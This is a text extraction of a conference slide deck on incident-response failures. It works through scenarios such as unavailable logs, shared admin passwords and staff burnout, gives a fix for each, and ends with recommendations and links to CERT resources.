Об угрозах информационной безопасности, актуальных для разработчика СЗИ
Tech w21
1. Session ID:
Session Classification:
James Christiansen
Sands Corporation
TECH-W21
Advanced
Incident Response:
How To GiveThe Advantage
ToThe Hackers
Paul Underwood
Emagined Security
2. Focus Of Our Presentation
Giving The Advantage To The Hackers
Due To:
ONE : The inability to distinguish what activities are
normal for your infrastructure
TWO : Not having all your incident response ducks lined
up in a row
THREE : Over reliance on untested resources
FOUR : Running out of energy before the bad guys do
FIVE : A lack of appreciation for how really difficult it is
to stop an ongoing hack attack completely
SIX :
4. Giving HackersThe Advantage
We are prettysure that'snormal traffic,at
least it lookssomewhatfamiliar
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
5. Giving HackersThe Advantage
We are prettysure that'snormal traffic,at
least it lookssomewhatfamiliar
THE FIX
Old systemlogsare not availablewhich
would help figuring
withinyour infrastructure
THE
SCENARIO
THE
GOTCHA
6. Giving HackersThe Advantage
We are prettysure that'snormal traffic,at
least it lookssomewhatfamiliar
Don't be in arush todisposeofyour old
systemlogs
Old systemlogsare not availablewhich
withinyour infrastructure
THE
SCENARIO
THE
GOTCHA
THE
FIX
7. Giving HackersThe Advantage
So, whatshould we do next? Isthisan
anomalythatisworth investigating?
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
8. Giving HackersThe Advantage
So, whatshould we do next? Isthisan
anomalythatisworth investigating?
THE FIX
Strange thingsare happeningbut youare
unable toprioritizeyour incidentresponse
team'sactivity
THE
SCENARIO
THE
GOTCHA
9. Giving HackersThe Advantage
So, whatshould we do next? Isthisan
anomalythatisworth investigating?
Know what'snormal in your infrastructure
soanomalousactivitiesstandout
Strange thingsare happeningbut youare
unable toprioritizeyour incidentresponse
team'sactivity
THE
SCENARIO
THE
GOTCHA
THE
FIX
11. Giving HackersThe Advantage
We needaspecialfirewallrule written
NOW! Get the vendor'sexperton the line!
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
12. Giving HackersThe Advantage
We needaspecialfirewallrule written
NOW! Get the vendor'sexperton the line!
THE FIX
You are unable tofind thesupport phone
numberfor thevendor'sexpert,no one
else hasit either
THE
SCENARIO
THE
GOTCHA
13. Giving HackersThe Advantage
We needaspecialfirewallrule written
NOW! Get the vendor'sexperton the line!
Have these "emergency"phonenumbers
printedout.Treat thesefolksbetterthan
your best friends!
You are unable tofind thesupport phone
numberfor thevendor's expert,no one
else hasit either.
THE
SCENARIO
THE
GOTCHA
THE
FIX
14. Giving HackersThe Advantage
You have evidencethatAdminlevel
passwordshave been hacked
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
15. Giving HackersThe Advantage
You have evidencethatAdminlevel
passwordshave been hacked
THE FIX
The sameAdminpasswordis used on
numerouscritical systems,but no one
knows exactlywhich ones
THE
SCENARIO
THE
GOTCHA
16. Giving HackersThe Advantage
You have evidencethatAdminlevel
passwordshave been hacked
Be preparedtochangeall Adminlevel
passwordsat a noticeusing a
testedprocess
The sameAdminpasswordis used on
numerouscritical systems,but no one
knows exactlywhich ones
THE
SCENARIO
THE
GOTCHA
THE
FIX
17. Giving HackersThe Advantage
You needtoisolateanetworksegment,
but Marketingsaysthatwould kill a
pendingnew product launch
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
18. Giving HackersThe Advantage
You needtoisolateanetworksegment,
but Marketingsaysthatwould kill a
pendingnew product launch
THE FIX
The inabilitytoisolatesegmentsofthe
network,only further complicatesa
complexproject
THE
SCENARIO
THE
GOTCHA
19. Giving HackersThe Advantage
You needtoisolateanetworksegment,
but Marketingsaysthatwould kill a
pendingnew product launch
Have a CEO supportedplan forsuspending
ongoingprojects while the incident
responseeffortis underway
The inabilitytoisolatesegmentsofthe
network, only further complicatesa
complexproject
THE
SCENARIO
THE
GOTCHA
THE
FIX
20. Giving HackersThe Advantage
The IRTeamisasking youfora decision.
Unfortunately,the decisionrequiresthat
youmakea LOT ofassumptions.
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
21. Giving HackersThe Advantage
The IRTeamisasking youfora decision.
Unfortunately,the decisionrequiresthat
youmakea LOT ofassumptions.
THE FIX
Being forcedintoa positionwhere you
have tostart guessing meansyou
have control ofthe situation.
THE
SCENARIO
THE
GOTCHA
22. Giving HackersThe Advantage
The IRTeamis asking youfora decision.
Unfortunately,the decisionrequiresthat
youmakea LOT ofassumptions.
Run legitimatehacks againstyour
infrastructure tounderstandwhat
happens,do thisbefore-the-fact.
Being forcedintoa positionwhere you
have tostart guessing meansyou
have control ofthe situation.
THE
SCENARIO
THE
GOTCHA
THE
FIX
23. Giving HackersThe Advantage
The hackersown your system. The
Webmasteristrying toget "pornlinks"off
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
24. Giving HackersThe Advantage
The hackersown your system. The
Webmasteristrying toget "porn links"off
THE FIX
The situationisgetting a lot worse. Your
only optionleft istothrow in the towel
and declarea disaster.
THE
SCENARIO
THE
GOTCHA
25. Giving HackersThe Advantage
The hackersown your system. The
Webmasteristrying toget "pornlinks"off
homepage.
Restoringyour systemstoa known good
stateand having a testedcustomer
notificationplan readytogo.
The situationisgetting a lot worse. Your
only optionleft istothrow in the towel
and declarea disaster.
THE
SCENARIO
THE
GOTCHA
THE
FIX
28. Giving HackersThe Advantage
Critical evidenceismistakenlydeleted,
attemptsat recoveringit have failed.
THE FIX
Not beingpreparedfor the fact thatserious
blunders will occur at somepointin the
response.
THE
SCENARIO
THE
GOTCHA
29. Giving HackersThe Advantage
Critical evidenceismistakenlydeleted,
attemptsat recoveringit have failed.
Aboveall else, rememberthatthisisa
learningprocessand not an exercisein
findingsomeonetoblame.
Not beingpreparedfor the fact thatserious
blunders will occur at somepointin the
response.
THE
SCENARIO
THE
GOTCHA
THE
FIX
31. Giving HackersThe Advantage
The initialincidentresponseisenteringits
3rd daywith no end in sight
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
32. Giving HackersThe Advantage
The initialincidentresponseisenteringits
3rd daywith no end in sight
THE FIX
Without enough sleepyou becomepart of
the problem
THE
SCENARIO
THE
GOTCHA
33. Giving HackersThe Advantage
The initialincidentresponseisenteringits
3rd daywith no end in sight
Cut a dealwith a nearbyhotel for
temporaryrooms -- make4 hr. sleep
breaksmandatoryevery 18 hours
Without enough sleepyou becomepart of
the problem
THE
SCENARIO
THE
GOTCHA
THE
FIX
36. Giving HackersThe Advantage
The hackersmayhave compromisedyour
VM farm.
THE FIX
The IncidentResponseteamisn't fluent in
VM speak,nor isit up on all theVM tools.
THE
SCENARIO
THE
GOTCHA
37. Giving HackersThe Advantage
The hackersmayhave compromisedyour
VM farm.
AvoidusingVM formission criticalsystems
asthey are hardertoanalyzefroma
forensicperspective.
The IncidentResponseteamisn't fluent in
VM speak,nor isit up on all theVM tools.
THE
SCENARIO
THE
GOTCHA
THE
FIX
39. Giving HackersThe Advantage
During the incidentresponseyour CEO is
clearly not happywith thecontinuedflow
ofbad news.
THE FIX
THE GOTCHA FACTOR
THE
SCENARIO
40. Giving HackersThe Advantage
During the incidentresponseyour CEO is
clearly not happywith thecontinuedflow
ofbad news.
THE FIX
Incidentresponsemitigationsseldomhave
anygoodnews during first80% of the
effort.
THE
SCENARIO
THE
GOTCHA
41. Giving HackersThe Advantage
During the incidentresponseyour CEO is
clearly not happywith thecontinued flow
ofbad news.
Educate managementto expectlots ofbad
news.
Bad news meansthe teamunderstands
the issues.
Incidentresponsemitigationsseldomhave
anygoodnews during first80% of the
effort.
THE
SCENARIO
THE
GOTCHA
THE
FIX
42. ► Within three months, you should:
► Review your incident response plan with the scenarios from this
presentation
► Update your contact lists, system inventories and skill assessments
► Beyond three months, you should:
► Obtain specific training for members of your incident response team
for areas of weakness you identified during your scenario testing
► Upgrade your staff with experts that can handle a major incident
within your organization
► Contract with a Business Recover Team (BRT) that can assist your
organization during a crisis
How to ApplyWhatYou Have Learned
43. ►
for even the best plan
► How to give the advantage to the hackers:
►
► Not having current contact lists, technical resources or contracted
resources to help
► Not having a good relationship with the business so they have
confidence in your ability to manage the incident
► Burning out the staff so they make bad decisions
► Not having a trained staff in investigation tools and techniques
► Not being able to make decisions and staying calm
Summary
44. ► CSIRT Resources (www.cert.org)
Handbook for Computer Security Incident Response Teams
http://www.cert.org/archive/pdf/csirt-handbook.pdf
CSIRT Services
http://www.cert.org/csirts/services.html
Organizational Models for CSIRTs
http://www.cert.org/archive/pdf/03hb001.pdf
State of the Practice for CSIRTs
http://www.cert.org/archive/pdf/03tr001.pdf
► www.sans.org
Resources Available
Steps for Creating National CSIRTs
http://www.cert.org/archive/pdf/NationalCSIRTs.pdf
Defining Incident Management Processes
http://www.cert.org/archive/pdf/04tr015.pdf
StaffingYour CSIRT
http://www.cert.org/csirts/csirt-staffing.html